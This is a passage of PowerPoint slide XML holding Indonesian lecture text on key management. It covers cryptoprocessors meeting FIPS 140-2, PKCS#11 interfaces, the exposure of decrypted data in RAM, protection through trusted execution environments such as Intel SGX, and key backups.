              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Federal 140 Level 2 (FIPS 140-2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di pasar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (API) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKCS#11.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (RAM) agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enklosur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (trusted execution environment/TEE), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Intel Software Guard Extensions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membacanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enklave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enklave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cipherteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecuali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
